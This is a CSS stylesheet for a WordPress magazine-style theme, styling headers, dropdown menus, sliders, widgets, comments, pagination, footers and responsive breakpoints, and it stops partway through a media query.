﻿body {
  background:#09151f;
}

.entry-content img,
.comment-content img,
.widget img {
  max-width:100%;
  /* Fluid images for posts,comments,and widgets */;
}

img[class*="align"],
img[class*="wp-image-"],
img[class*="attachment-"] {
  height:auto;
  /* Make sure images with WordPress-added height and width attributes are scaled correctly */;
}

img.size-full,
img.size-large,
img.header-image,
img.post-image {
  max-width:100%;
  height:auto;
  /* Make sure images with WordPress-added height and width attributes are scaled correctly */;
}

embed,
iframe,
object,
video {
  max-width:100%;
}

.entry-content .twitter-tweet-rendered {
  max-width:100% !important;
  /* Override the Twitter embed fixed width */;
}

img.wp-smiley,
.rsswidget img {
  border:0;
  border-radius:0;
  box-shadow:none;
  margin-bottom:0;
  margin-top:0;
  padding:0;
}

.entry-content dl.gallery-item {
  margin:0;
}

.gallery-item a,
.gallery-caption {
  width:90%;
}

.gallery-item a {
  display:block;
}

.gallery-caption a {
  display:inline;
}

.gallery-columns-1 .gallery-item a {
  max-width:100%;
  width:auto;
}

.gallery .gallery-icon img {
  height:auto;
  max-width:90%;
  padding:5%;
}

.gallery-columns-1 .gallery-icon img {
  padding:3%;
}

/* Alignment */

.alignleft {
  display:inline;
  float:left;
  margin-right:1.625em;
}

.alignright {
  display:inline;
  float:right;
  margin-left:1.625em;
}

.aligncenter {
  clear:both;
  display:block;
  margin-left:auto;
  margin-right:auto;
}

.wp-caption {
  max-width:100%;
  /* Keep wide captions from overflowing their container. */

	padding:4px;
}

.wp-caption .wp-caption-text,
.gallery-caption,
.entry-caption {
  font-style:italic;
  font-size:12px;
  font-size:0.857142857rem;
  line-height:2;
}

/* Author profiles */

.author .archive-header {
  margin-bottom:24px;
  margin-bottom:1.714285714rem;
}

.author-info {
  border-top:1px solid #eeeeee;
  margin:24px 0;
  margin:1.714285714rem 0;
  padding-top:24px;
  padding-top:1.714285714rem;
  overflow:hidden;
}

.author-description p {
  font-size:13px;
  font-size:0.928571429rem;
  line-height:1.846153846;
}

.author.archive .author-info {
  border-top:0;
  margin:0 0 48px;
  margin:0 0 3.428571429rem;
}

.author.archive .author-avatar {
  margin-top:0;
}

.sticky h2.entry-title {
  background:#f8f8f8;
  padding-left:10px;
  padding-right:10px;
}

.sticky h2.entry-title a {
  color:#dd3333;
}

.sticky h2.entry-title a:hover,
.sticky h2.entry-title a:focus {
  color:#0088cc;
}

#page {
  /*margin:10px auto 40px;*/
}

.nobot {
  margin-bottom:0 !important;
}

.fl {
  float:left;
}

.fr {
  float:right;
}

#header {
  background:#fff;
  padding:0;
  width:100%; max-width:1250px;
}

#mast-head {
  float:left;
  width:100%;
}

#logo {
  padding:14px 0;
}

h1.site-title {
  font-size:18px;
  line-height:1;
  margin:5px 0;
}

h1.site-title a {
  color:#eee;
}

h2.site-description {
  color:#eee;
  font-size:14px;
  line-height:1;
  margin:0 0 10px;
}

.navbar .nav > li > a {
  border-right:1px solid #485a63;
  padding:15px !important;
}

/* Dropdown menu style starts */

.caret {
  display:none !important;
}

.navbar .nav > li > a:hover,
.navbar .nav > li > a:focus {
  color:#fff !important;
  background:#303e45 !important;
}

ul.sub-menu, ul.dropdown-menu,
ul.sub-menu ul.sub-menu{
	display:none;
}

ul.dropdown-menu ul.dropdown-menu {
  top:0;
  left:100%;
  display:none;
}

ul.dropdown-menu {
  width:221px;
  background:#303e45;
  box-shadow:none;
  -moz-box-shadow:none;
  -webkit-box-shadow:none;
  -o-box-shadow:none;
  border-radius:0;
  -moz-border-radius:0;
  -webkit-border-radius:0;
  -o-border-radius:0;
  padding:0;
  margin-top:0;
  border:none;
  border-bottom:3px solid #81b752;
}

.dropdown-menu:before,
.dropdown-menu:after {
  display:none !important;
}

ul.dropdown-menu a {
  color:#a9b9c1 !important;
  border-bottom:1px solid #37474f;
  padding-top:10px !important;
  padding-bottom:9px !important;
}

ul.dropdown-menu a:hover,
ul.dropdown-menu a:active,
ul.dropdown-menu a:focus {
  background:#2c393f !important;
  color:#fff !important;
}

/* Dropdown menu style ends */

ul.nav li.dropdown:hover > ul.dropdown-menu {
  display:block !important;
}

.navbar .btn,
.navbar .btn-group {
  margin-top:10px !important;
}

#headline {-webkit-box-sizing:border-box;box-sizing:border-box;-moz-box-sizing:border-box;
  background:#ebebeb;
  padding:30px 40px 0;
}

#headline .post {
  background:#FFF;
  margin-bottom:30px;
  padding:10px;
}

#headline .post a {
  color:#555E6B;
}

#headline .post h3 {
  font-size:13px;
  font-weight:normal;
  line-height:16px;
  margin:0 0 0.1em;
}

#headline .post p {
  color:#646464;
  font-size:12px;
  margin:0;
}

#headline .post img {
height:64px;
  float:left;
  margin-right:10px;
}

/* intr section



/***************/

#intr {
  background:#f7f7f7;
  border-bottom:1px solid #d4d4d4;
  border-top:1px solid #d4d4d4;
  height:43px;
  width:100%; max-width:1246px;
  padding:0 2px;
  overflow:hidden;
}
#intr .navbar {background:none !important; display:inline-block;}
#intr .navbar .nav > li > a{border-right:none; text-shadow:none; line-height:43px; color:#777 !important;padding:0 15px !important;}
#intr .navbar-inverse .nav>li>a:focus, #intr .navbar-inverse .nav>li>a:hover{background:#e0e0e0 !important;}
.brnews {
  max-height:45px;
  padding:9px 0;
}

.brnews a {
  color:#555E6B;
}

.brnews .entry {
  display:inline-block;
}

.brnews h3 {
  background:url("images/brnews-bg1.png") no-repeat;
  background-size:110px;
  color:#FFF;
  float:left;
  font-size:11px;
  line-height:1;
  margin:0;
  padding:6px 7px 7px;
  width:115px;
}

#scroller li {
  list-style:none;
}

#scroller li .title {
  font-weight:bold;
}

#scroller li .title:after {
  content:"»";
  font-weight:normal;
  margin:0 3px 0 15px;
}

#scroller li p {
  display:inline-block;
  margin:2px 0 0;
}

#intr .search {
  float:right;
}

#intr .search input[type="text"] {
  border:medium none;
  box-shadow:none;
  height:33px;
  width:77%;
}

#intr input#searchsubmit {
  position:absolute;
  right:0;
}

/* searchform */

#searchform p {
  position:relative;
}

#searchform input[type="text"] {
  border-radius:0 0 0 0;
  font-weight:normal !important;
  height:31px;
  margin:0;
}

.search form {
  background:#FFF;
  border-left:1px solid #d4d4d4;
}

.widget .search form#searchform,
.footer-widget .search form#searchform {
  background:none !important;
  border-left:none;
}

input#searchsubmit {
  background:url("images/search-bg1.png") no-repeat;
  border:none;
  height:41px;
  width:44px;
  text-indent:-9999px;
}

/* end searchform */

#content {
  background:#FFF;
  padding:40px 40px 0;
}

#slider {
  position:relative;
  margin:0 0 2.3em;
}

#home-top {
  position:relative;
  margin:0 0 5.7em;
}

#home-bottom {
  position:relative;
  margin:0 0 0.8em;
}

#home-middle {
  position:relative;
  margin:0 0 3em;
}

/* SLIDER */

#slider .entry {
  background:rgba(61,76,84,0.8);
  position:absolute;
  bottom:0;
  padding:10px;
  width:100%;
}

#slider .entry h4,
#slider .entry p {
  margin:0;
  width:97%;
}

#slider .entry h4, .entry a, .entry a:hover {
  color:#FFFFFF;
  font-size:26px;
  font-weight:normal;
  padding-bottom:10px;
  line-height:30px;
}

#slider .entry p {
  color:#FFFFFF;
  font-size:14px;
}

.flex-control-thumbs .flex-active {
  background:url("images/thumb-active.png") no-repeat;
  background-size:cover;
  margin-top:-4%;
  padding-top:8%;
}

/* Slide right content */

#slide-right h3 {
  background:#3d4c54;
  color:#FFF;
  font-size:16px;
  font-weight:normal;
  margin:0;
  padding:5px 0;
  text-align:center;
}

#slide-right ul {
  background:#fff;
  margin:0;
  padding:5px;
  counter-reset:li;
  /* Initiate a counter */;
}

#slide-right ul li {
  background:#FFF;
  margin:5px 0;
  padding:5px 0;
  list-style:none;
  position:relative;
  /* Create a positioning context */;
}

#slide-right ul li:first-child {
  padding:0;
}

#slide-right ul li:last-child {
  display:none;
}

#slide-right ul li:after {
  background:#FF8C8C;
  color:#FFFFFF;
  position:absolute;
  right:0;
  text-align:center;
  top:0;
  width:8%;
}

#slide-right h4 {
  font-weight:bold;
  margin:0 5px 0 0;
  font-size:14px;
}

/* BXSlider



/***********/

ul.bxslider,
ul.gallery {
  margin:0;
}

.bx-wrapper .meta {
  border-bottom:1px solid #eee;
  border-top:1px solid #eee;
  padding:0.5em 0;
}

.bx-controls {
  position:absolute;
  right:0;
  top:1px;
}

.bx-prev,
.bx-next {
  background:url("images/bx-bg.png") no-repeat;
  display:inline-block;
  height:27px;
  width:30px;
}

.bx-next {
  background-position:-30px;
}

.bx-wrapper h4 {
  font-weight:normal;
}

#gallery {
  position:relative;
  height:auto !important;
}
#gallery .bx-viewport{height:auto !important;}

.post-icon {
  float:left;
  margin-right:10px;
}

h1.entry-title {
  font-size:24px;
  text-transform:uppercase;
   color:#3E4548;
  /*border-bottom:1px solid #eee;*/
    /*margin:0 0 30px;*/
  line-height:2em;
}

h3.title {
  font-size:18px;
}

.title span,
h1.entry-title span {
  background:#E9ECEE;
  ;
  padding:0 15px;
  display:inline-block;
}

h4.post-title {
  color:#555e6b;
  margin:10px 0;
  line-height:1.3em;
  position:relative;
}

h4.post-title a {
  color:#555e6b;
  font-size:15px;
}

.moretag {
  color:#fff;
  background:#767b7e;
  display:block;
  margin:10px 0;
  padding:5px 0;
  text-align:center;
  width:100px;
  transition:all 0.8s linear 0s;
  float:right;
  font-size:14px;
}

.moretag:hover,
.moretag:focus {
  color:#fff;
  background:#555;
  text-decoration:none;
}

/* Home



/**************/

.thumb {
  width:91px;
}

#home-middle .date,
#home_bottom_al .date,
#home-bottom .date,
.latest-posts .date {
  color:#939EAD;
  font-weight:normal;
  position:absolute;
  right:15px;
}

.meta span.date,
span.date,
.post-time {
  color:#939EAD;
}

#home-middle .post,
#home_bottom_al .post,
#home-bottom .post,
.latest-posts  .post {
  border-bottom:1px solid #eee;
  padding:1em 0;
}

#home-middle .post:first-child,
#home_bottom_al .post:first-child,
.latest-posts  .post:first-child {
  margin:0 0 10px;
  padding:0;
}

#home-bottom .post:first-child {
  padding:0 0 1em;
}

#home-middle  .post:last-child,
#home_bottom_al .post:last-child,
#home-bottom  .post:last-child,
.latest-posts:last-child,
.latest-posts  .post:last-child {
  border-bottom:none;
}

#home-middle .entry h4,
#home_bottom_al .entry h4,
#home-bottom .entry h4,
.latest-posts .entry h4 {
  margin:0;
}

#home-middle .entry .date,
#home_bottom_al .entry .date,
#home-bottom .entry .date,
.latest-posts .entry .date {
  position:static;
}

#home-middle .entry p,
#home-bottom .entry p,
#home_bottom_al .entry p,
.latest-posts .entry p {
  margin:0 0 5px;
}

#home-middle .entry img,
#home_bottom_al .entry img,
#home-bottom .entry img,
.latest-posts .entry img {
  float:left;
  margin-right:7px;
}

/* Single post */

.entry-content {
  color:#646464;
  height:auto; 
  /*overflow:Hidden;*/
  font-size:18px;
  line-height:28px;
  padding:5px 0 40px;
}

.entry-content img {
  max-width:100%;
}

.entry-content h2{
font-size:20px;
/*text-transform:uppercase;*/
color:#646464;
}

h2.entry-title {
  color:#37474d;
  border-bottom:1px solid #eee;
  font-weight:normal;
  margin:0;
  position:relative;
  font-size:28px;
}

.the_title {
  display:inline-block;	
  /*max-width:70%;  */
  padding:0 0 20px 0;
}

.entry-cat {
  border-bottom:5px solid #FA8484;
  font-size:13px;
  font-weight:bold;
  line-height:30px;
  padding:0 5px;
  position:absolute;
  right:0;
  max-width:30%;
  bottom:0;
}

.entry-cat a {
  color:#555f6b;
}

.entry-meta {
  border-bottom:1px solid #eee;
  border-top:1px solid #eee;
  margin:0 0 1.5em;
}

.entry-meta,
.entry-meta a {
  color:#8a8f90;
}

.entry-meta ul {
  margin:0;
  list-style:none;
}

.entry-meta ul li {
  float:left;
  border-right:1px solid #eee;
  padding:10px 20px;
}

.entry-meta ul li:first-child {
  padding:0;
}

.entry-meta ul li:last-child {
  border-right:0;
}

.entry-meta ul li.tagz {
    border-right: medium none;
    height: 15px;
    overflow: hidden;
    max-width: 31%;
}

.auth-name{
padding-top:15px;
}

.entry-meta ul li img {
  margin-right:10px;
  padding:3px 0 0;
  vertical-align:top;
}

.single-rate {
  display:none;
}

.single .entry-content .single-rate {
  display:inline-block;
  float:left;
  position:relative;
  top:-4px;
  margin-right:15px;
}

.single .entry-content .ratings {
  margin:15px 0;
}

.post-entries {
  margin:0 0 30px;
}

#calendar_wrap {
  border:1px solid #d3d3d3;
  padding:10px 20px;
}

#wp-calendar {
  border-collapse:separate;
  border-spacing:5px;
  width:100%;
}

#wp-calendar td {
  color:#464e52;
  border:1px solid #d3d3d3;
  font-size:15px;
  padding:10px 5px;
  text-align:right;
}

#wp-calendar td#prev {
  text-align:left;
}

#wp-calendar td.pad {
  border:none;
}

#wp-calendar td#prev,
#wp-calendar td#next {
  border:none;
}

#wp-calendar td#today {
  background:#f3643c;
  border:1px solid #f3643c;
  color:#fff;
}

#wp-calendar td#today a {
  color:#fff;
}

/* Pagination 

/*************/

.magz-pagination {
  border-top:1px solid #eee;
  padding:10px 0 0;
  text-align:center;
}

.magz-pagination .page-numbers {
  color:#767B7E;
  margin-right:15px;
  font-size:20px;
}

.magz-pagination .current {
  color:#121212;
}

.magz-pagination .prev,
.magz-pagination .next {
  background:#767B7E;
  color:#FFFFFF;
  padding:2px 15px;
  transition:all 0.8s linear 0s;
}

.magz-pagination .prev:hover,
.magz-pagination .next:hover {
  background:#555;
  text-decoration:none;
}

.page-link .prev {
  margin-right:10px;
}

.page-link .next {
  margin-left:10px;
}

/* COMMENT */

ol.commentlist,
ol.children {
  margin:0;
  list-style:none;
}

.commentlist li {
  margin:0 0 10px;
}

.commentlist li.bypostauthor .fn {
  color:#fa8484;
}

.commentlist li.bypostauthor .fn span {
  padding-right:5px;
}

.children li {
  margin-left:120px;
}

.children li .comment {
  background:#f6f6f6;
}

article.comment {
  border-bottom:1px solid #eee;
  border-top:1px solid #eee;
  border-right:1px solid #eee;
  border-left:1px solid #eee;
  margin:10px 0;
  position:relative;
}

article.comment cite a {
  color:#55656b;
}

article.comment cite:after {
  content:"|";
  color:#b8bbc0;
  margin-right:3px;
  margin-left:20px;
}

article.comment time {
  font-size:12px;
}

.comment .reply {
  position:absolute;
  right:0;
  top:0;
}

.comment .reply  a {
  color:#7b818b;
  background:#d7d7d7;
  padding:2px 10px 3px;
}

.comment .reply  a:hover {
  text-decoration:none;
}

.comment .avatar {
  float:left;
  margin-right:20px;
}

.input_field {
  float:left;
  margin-right:4%;
  width:48%;
}

.comment-form-comment {
  clear:both;
}

.comment-form-comment textarea#comment {
  border:1px solid #eee;
  border-radius:0;
  box-shadow:none;
  width:97.6%;
}

form#commentform p {
  margin-bottom:1em;
}

form#commentform .comment-notes {
  display:none;
}

form#commentform input#author,
form#commentform input#email {
  border:1px solid #eee;
  border-radius:0;
  box-shadow:none;
  width:95%;
}

form#commentform input#submit {
  color:#FFF;
  background:#6f9c26;
  border:none;
  font-family:Noticia Text,serif;
  font-size:13px !important;
  padding:0.5em 1em;
}

article .post-like {
  margin-top:1em;
}

article .like {
  background:url(images/icons.png) no-repeat 0 0;
  width:15px;
  height:16px;
  display:block;
  float:left;
  margin-right:4px;
  -moz-transition:all 0.2s ease-out 0.1s;
  -webkit-transition:all 0.2s ease-out 0.1s;
  -o-transition:all 0.2s ease-out 0.1s;
}

article .post-like a:hover .like {
  background:url(images/icons.png) no-repeat -16px 0;
}

article .voted .like,
article footer .post-like .alreadyvoted {
  background-position:-32px 0;
}

/* CForm */

.contact-form label,
.contact-form input,
.contact-form textarea {
  display:block;
  margin:10px 0;
}

.contact-form label {
  font-size:larger;
}

.contact-form input {
  padding:5px;
  width:100%;
}

.contact-form input#cf_website {
  margin-right:0;
}

.cform {
  float:left;
  width:30%;
  margin-right:4.4%;
}

.website {
  margin-right:0;
}

#cf_message {
  width:98%;
  padding:10px;
}

#cf_send {
  background:none repeat scroll 0 0 #6F9C26;
  border:medium none;
  color:#FFFFFF;
  font-family:Noticia Text,serif;
  font-size:12px;
  padding:1em 1.5em;
  width:auto;
}

h3.kontak {
  margin:0;
  padding:0 15px;
  font-weight:normal;
}

.widget .kontak ul {
  border-left:1px solid #eee;
  border-right:1px solid #eee;
  list-style:none;
  margin:0;
  padding:0;
}

.widget .kontak ul li {
  border-bottom:1px solid #eee;
  padding:20px;
}

.widget .kontak ul li.address:before,
.widget .kontak ul li.email:before,
.widget .kontak ul li.phone:before,
.widget .kontak ul li.website:before {
  content:"";
  float:left;
  height:20px;
  width:25px;
}

.widget .kontak ul li.address:before {
  background:url("images/address-bg.png") no-repeat scroll left center transparent;
}

.widget .kontak ul li.email:before {
  background:url("images/mail-bg.png") no-repeat scroll left center transparent;
}

.widget .kontak ul li.phone:before {
  background:url("images/phone-bg.png") no-repeat scroll left center transparent;
}

.widget .kontak ul li.website:before {
  background:url("images/website-bg.png") no-repeat scroll left center transparent;
}

.widget .kontak ul li.address p {
  margin:0 0 0 25px;
}

.widget .kontak h4 {
  margin:0;
}

/* Footer 



/***************/

#footer-widgets {
  background:#f1f1f1;
  padding:20px 40px;
}

.footer-widget h3.title {
  margin:20px 0;
}

#footer-widgets .title span {
  background:#fff;
  color:#3e4548;
}

#site-info {
  background:#23323f;
  font-size:14px;
  padding:15px 40px;
}

#site-info p {
  margin:0;
}

ul#menu-footer {
  margin:0;
}

#footer-nav li {
  list-style:none;
  float:left;
}

#footer-nav li:after {
  content:"";
}

#footer-nav li:last-child:after {
  content:"";
}

#footer-nav li a {
  color:#FFFFFF;
  padding:0 12px;
  line-height:30px;
  transition:all 0.8s linear 0s;
  -webkit-transition:all 0.8s linear 0s;
  -moz-transition:all 0.8s linear 0s;
  -o-transition:all 0.8s linear 0s;
}

#footer-nav li a:hover {
  color:#fff;
  text-decoration:none;
}

#footer-nav li:first-child a {
  padding-left:0;
}

#footer-nav ul.sub-menu,
#footer-nav .dropdown .caret,
#footer-nav .children {
  display:none;
}
#footer-nav ul{display:block; height:auto; overflow:Hidden; margin:0;}
/* Widgets



/*************/

.widget {
  margin:0 0 30px;
}

.widget.widget_rss ul,
.widget.widget_archive ul,
.widget.widget_nav_menu ul,
.widget.widget_recent_comments ul,
.widget.widget_recent_entries ul,
.widget.widget_pages ul,
.widget.widget_meta ul,
.widget.widget_categories ul {
  margin:0;
  list-style:none;
}

.widget.widget_rss ul li,
.widget.widget_archive ul li,
.widget.widget_nav_menu ul li,
.widget.widget_recent_comments ul li,
.widget.widget_recent_entries ul li,
.widget.widget_pages ul li,
.widget.widget_meta ul li,
.widget.widget_categories ul li {
  padding:10px 0;
  border-bottom:1px solid #eeeeee;
}

.widget.widget_rss ul li:first-child,
.widget.widget_archive ul li:first-child,
.widget.widget_nav_menu ul li:first-child,
.widget.widget_recent_comments ul li:first-child,
.widget.widget_recent_entries ul li:first-child,
.widget.widget_pages ul li:first-child,
.widget.widget_meta ul li:first-child,
.widget.widget_categories ul li:first-child {
  padding-top:0;
}

/* General Widgets */

/* tab widget */

#tabwidget ul {
  margin:0;
  list-style:none;
}

ul#tabnav li {
  float:left;
  width:33.33%;
}

ul#tabnav h3 {
  font-size:13px;
  font-weight:normal;
  margin:0;
}

ul#tabnav li img {
  margin-right:7px;
}

ul#tabnav li a {
  color:#FFF;
  background:#3d4c54;
  border-right:1px solid #485A63;
  display:block;
  padding:5px 0;
  text-align:center;
}

ul#tabnav li a:last-child {
  border-right:none;
}

ul#tabnav li a:hover,
ul#tabnav li a.selected {
  background:#81b752;
  text-decoration:none;
}

#tab-content {
  border:1px solid #eee;
}

ul.recent-tab li {
  padding:15px;
  border-bottom:1px solid #eee;
}

.recent-tab li:last-child {
  border-bottom:none;
}

ul.recent-tab li p {
  margin:0;
}

ul.recent-tab img {
  float:left;
  height:65px;
  margin-right:1em;
}

ul.recent-tab h4 {
  margin:0;
}

#tab3 {
  padding:0;
}

#tab3 ul li {
  padding:15px;
  border-bottom:1px solid #eeeeee;
}

/* end tab widget */

.latest-post {
  border-bottom:1px solid #eee;
  padding:0.7em 0;
}

.latest-post:last-child {
  border-bottom:none;
  padding:0.7em 0 1.5em;
}

.latest-post:first-child {
  padding:0 0 0.7em;
}

.latest-post img {
  margin-right:1em;
  height:65px;
}

.latest-post h4 {
  margin:0 0 5px;
  line-height:1;
  font-size:15px;
  font-weight:normal;
}

.latest-post2 h4 {
  text-transform:uppercase;
}

.latest-post h4 a {
  color:#555E6B;
  line-height:22px;
}

.latest-post .excerpt {
  clear:left;
  padding:5px 0;
}

.twit-entry {
  float:left;
  width:75%;
}

.tagcloud:before,
.tagcloud:after {
  content:"";
  display:table;
  line-height:0;
}

.tagcloud:after {
  clear:both;
}

.tagcloud a {
  float:left;
  background-color:#fff;
  -webkit-transition:all 0.8s linear 0s;
  -moz-transition:all 0.8s linear 0s;
  -o-transition:all 0.8s linear 0s;
  transition:all 0.8s linear 0s;
  color:#555E6B;
  font-size:12px !important;
  margin:0 5px 5px 0;
  padding:3px 9px;
}

.tagcloud a:hover {
  background-color:#0088CC;
  color:#FFF;
  text-decoration:none;
}

.socmed {
  padding:10px 0;
}

.socmed ul {
  margin:0;
  list-style:none;
}

.socmed ul li {
  border-left:1px solid #e3e3e3;
  float:left;
  text-align:center;
  *margin-left:2.5641%;
  width:32.7%;
  *width:31.914893617021278%;
}

.socmed ul li:first-child {
  margin-left:0;
}

.socmed ul li:last-child {
  border-right:1px solid #e3e3e3;
}

.socmed h4 {
  margin:10px 0 0;
}

.socmed p {
  color:#758188;
  font-size:13px;
}

.video-box h3 {
  margin:10px 0 30px;
}

.video-box ul {
  margin:5px 0 0 0;
  list-style:none;
}

.video-box ul li {
  float:left;
  margin-left:1.64%;
  width:23.77%;
}

.video-box ul li:first-child {
  margin-left:0;
}

.video-box iframe {
  max-width:100%;
}

.block5 .footer-logo {
  float:left;
  border-right:1px solid #e3e3e3;
  min-height:45px;
  margin-right:4%;
  padding:4% 4% 4% 0;
  width:25.6%;
}

.block5 .footer-text {
  float:left;
  width:66%;
}

/* jPage custom style

/**********************/

  .holder {
  background:#f8f8f8;
  height:48px;
  margin:0 !important;
  position:relative;
}

.holder a {
  font-size:12px;
  cursor:pointer;
  margin:0 !important;
  color:#333;
}

.holder a:hover {
  background-color:#222;
  color:#fff;
}

.holder a.jp-previous,
.holder a.jp-next {
  background:url("images/bx-bg.png") no-repeat !important;
  display:inline-block;
  height:27px;
  text-indent:-9999px;
  position:absolute;
  top:10px;
  width:30px;
  margin-right:0 !important;
}

.bx-prev:hover,
.bx-next:hover,
a.jp-previous:hover,
a.jp-next:hover {
  background:url("images/bx-bg-hover.png") no-repeat !important;
}

.bx-next:hover,
a.jp-next:hover {
  background-position:-30px center !important;
}

.holder a.jp-previous {
  margin-right:15px;
  right:40px;
}

.holder a.jp-next {
  background-position:-30px center !important;
  margin-left:15px;
  right:10px;
}

.holder a.jp-current,
a.jp-current:hover {
  color:#FF4242;
  font-weight:bold;
}

.holder a.jp-disabled,
a.jp-disabled:hover {
  color:#bbb;
}

.holder a.jp-current,
a.jp-current:hover,
.holder a.jp-disabled,
a.jp-disabled:hover {
  cursor:default;
  background:none;
}

.holder span {
  margin:0 5px;
}

.holder2 {
  background:#f8f8f8;
  height:48px;
  margin:0 !important;
  position:relative;
}

.holder2 a {
  font-size:12px;
  cursor:pointer;
  margin:0 !important;
  color:#333;
}

.holder2 a:hover {
  background-color:#222;
  color:#fff;
}

.holder2 a.jp-previous,
.holder2 a.jp-next {
  background:url("images/bx-bg.png") no-repeat !important;
  display:inline-block;
  height:27px;
  text-indent:-9999px;
  position:absolute;
  top:10px;
  width:30px;
  margin-right:0 !important;
}

.holder2 a.jp-previous {
  margin-right:15px;
  right:40px;
}

.holder2 a.jp-next {
  background-position:-30px center !important;
  margin-left:15px;
  right:10px;
}

.holder2 a.jp-current,
a.jp-current:hover {
  color:#FF4242;
  font-weight:bold;
}

.holder2 a.jp-disabled,
a.jp-disabled:hover {
  color:#bbb;
}

.holder2 a.jp-current,
a.jp-current:hover,
.holder2 a.jp-disabled,
a.jp-disabled:hover {
  cursor:default;
  background:none;
}

.holder2 span {
  margin:0 5px;
}

/* Bootstrap adjustment



/***********************/

.caret {
  border-top:4px solid #FFF !important;
}

.dropdown .caret {
  margin-left:10px !important;
}

blockquote {
  background:#eee;
  border-left:5px solid #78c1cf !important;
  padding:15px !important;
  font-size:19px !important;
  font-style:italic;
  line-height:22px;
}

blockquote p {
  font-size:19px !important;
  font-style:italic;
  line-height:18px;
}

input,
button,
select,
textarea {
  font-family:inherit !important;
  font-size:12px !important;
}

select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
  font-size:13px !important;
}

.search input,
.search button,
.search select,
.search textarea {
  color:inherit !important;
  font-weight:normal !important;
}

/* Misc */
#home-top a.image_thumb_zoom {max-height:97px;}
#home-top a.image_thumb_zoom img{min-height:97px;}
#gallery a.image_thumb_zoom {max-height:97px;}
#gallery a.image_thumb_zoom img{min-height:97px;}
a.image_thumb_zoom {
  max-height:200px;
  position:relative;
  overflow:hidden;
  display:block;
}

a.image_thumb_zoom img {
  position:relative;
  -webkit-transition:all 0.5s ease-in;
  -moz-transition:all 0.5s ease-in;
  -o-transition:all 0.5s ease-in;
  width:100%; height:auto;
  transition:all 0.5s ease-in;
}

a.image_thumb_zoom:hover img {
  /*-webkit-transform:scale(1.2);
  -moz-transform:scale(1.2);
  -o-transform:scale(1.2);
  transform:scale(1.2);*/
}

.home_dop_block{margin:0 !important; width:30% !important}
.home_dop_block1{margin:0 0 0 5% !important; width:30% !important}
.home_dop_block2{width:100% !important; margin: 25px 0 !important;}
#home_dop_block3{margin:0 !important; width:31% !important; float:right; -webkit-box-sizing:border-box;box-sizing:border-box;-moz-box-sizing:border-box;}
.home_bottom_al1{width:65% !important; float:left !important;}
.home_bottom_al2{width:100% !important; margin:0 !important;}
.posting_pop a img{width:100%; max-height:220px;}
.forcat{float:left; max-height:180px; overflow:Hidden; min-height:180px; width:300px; margin:0 10px 0 0;}
.forcat img{width:100%; height:auto;min-height:180px;}
.footer-widget .widget{ margin:0 0 5px !important;}
.foot_copy{-webkit-box-sizing:border-box;box-sizing:border-box;-moz-box-sizing:border-box;border-left:1px solid #e3e3e3;padding:0 15px 0 40px;width:100%; text-align:left; height:auto; overflow:hidden;}
.foot_copy1{border-left:1px solid #e3e3e3;border-right:1px solid #e3e3e3;padding:15px 0;width:100%; text-align:center; height:auto; overflow:hidden;}
.foot_copy1 p{width:100%; text-align:center; height:auto; overflow:hidden; margin:5px 0;}
.foot_copy1 a{width:100%; display:block; height:auto; overflow:hidden; text-align:center;}
.mini_menu{margin: 70px 10px 0 0 !important;float:right; width:47%; height:auto; line-height:150%;overflow:Hidden; display:block; margin:70px 10px 0 0;}
.mini_menu ul{float:right; list-style:none; margin:0; display:inline-block;}
.mini_menu ul li{display:inline-block; margin:0;}
.mini_menu ul li:first-child{margin:0 15px;}
.mini_menu ul li a{text-transform:uppercase; color:#919191;display:block; padding-left:16px; }
a.svz{background:url(images/11.png) left no-repeat;}
/*a.stp{background:url(images/12.png) left no-repeat;}*/

.first-img{
/*float:none;*/
float:left;
padding: 0 0 0 0;
}

@media (min-width:1200px) {
  #slide-right ul li {
    //margin:10px 12px 11px;
  }
  #slide-right ul li:last-child {
    display:block;
  }
.first-img{
float:left;
padding:0 18px 10px 0;
}
}

@media (min-width:980px) and (max-width:1199px) {
  #header,
  #headline,
  #content,
  #footer-widgets,
  #site-info {-webkit-box-sizing:border-box;box-sizing:border-box;-moz-box-sizing:border-box;
    padding-left:25px;
    padding-right:25px;
  }
  ul#tabnav h3 {
    font-size:13px;
  }
  #intr{margin:0 25px; width:auto;}
  .navbar {
    float:right;
    width:100%;
  }
  .navbarlov{width:74% !important; float:left !important}
  .navbar .nav > li > a {
    padding:15px 6px !important;
    font-size:12px;
  }
  .first-img{
float:left;
padding-right:12px;
}
}

@media (min-width:768px) and (max-width:979px) {
.breadcrumbs{
display:none;
}
  .navbar .nav > li > a {
    border-right:none;
  }
  .mini_menu{margin: 10px 0 !important;width:100%; float:none;}
  #headline .post img {
    float:none;
  }
  #slide-left,
  #slide-right,
  ul#tabnav li {
    width:100%;
  }
  #slide-right {
    margin-left:0;
  }
  #slider .entry h4,
  #slider .entry p {
    font-size:11px;
  }
  #home-middle .date,
  #home_bottom_al .date,
  #home-bottom .date,
  .latest-posts .date {
    position:static;
    display:block;
  }
  ul#tabnav li a {
    padding-left:15px;
    text-align:left;
  }
  .span61 {
    width:100% !important;
  }
  
  .footer-widget:first-child {
    margin-left:2.76243% !important;
  }
  .block5 {
    width:100% !important;
  }
  .block5 .footer-logo {
  border-right:0 !important;
  margin:0 !important; padding:0 !important;
    width:29% !important;
  }
  .block5 .footer-text{width:64% !important; float:right !important;}
    .foot_copy{border-left:none;padding:0 !important;}
.foot_copy1{border-left:none;border-right:none; padding:0 !important;}
.footer-widget:first-child{margin-left: 0 !important;}
.navbar{padding:5px 0 10px;}
#intr .search{width:auto !important;}
}

@media (min-width:768px) and (max-width:798px) {
.breadcrumbs{
display:none;
}
  #header,
  #headline,
  #content,
  #footer-widgets,
  #site-info {-webkit-box-sizing:border-box;box-sizing:border-box;-moz-box-sizing:border-box;
    padding-left:10px;
    padding-right:10px;
  }
  .footer-widget {
    float:none !important;
    width:95.6% !important;
  }
  .navbar{padding:5px 0 10px;}
#intr{width:auto;}  .mini_menu{margin: 10px 0 !important;width:100%; float:none;} #logo{width:100% !important; float:none !important; text-align:center !important;}
}

@media (max-width:767px) {
.single-head{
display:none;
}
.breadcrumbs{
display:none;
}
  .navbar .nav > li > a {
    border-right:none;
  }
.home_dop_block,.home_dop_block1,#home_dop_block3{margin:0 !important; width:100% !important}
#headline{padding:10px 25px 0;}
.home_bottom_al1{width:100% !important;}
  #intr {
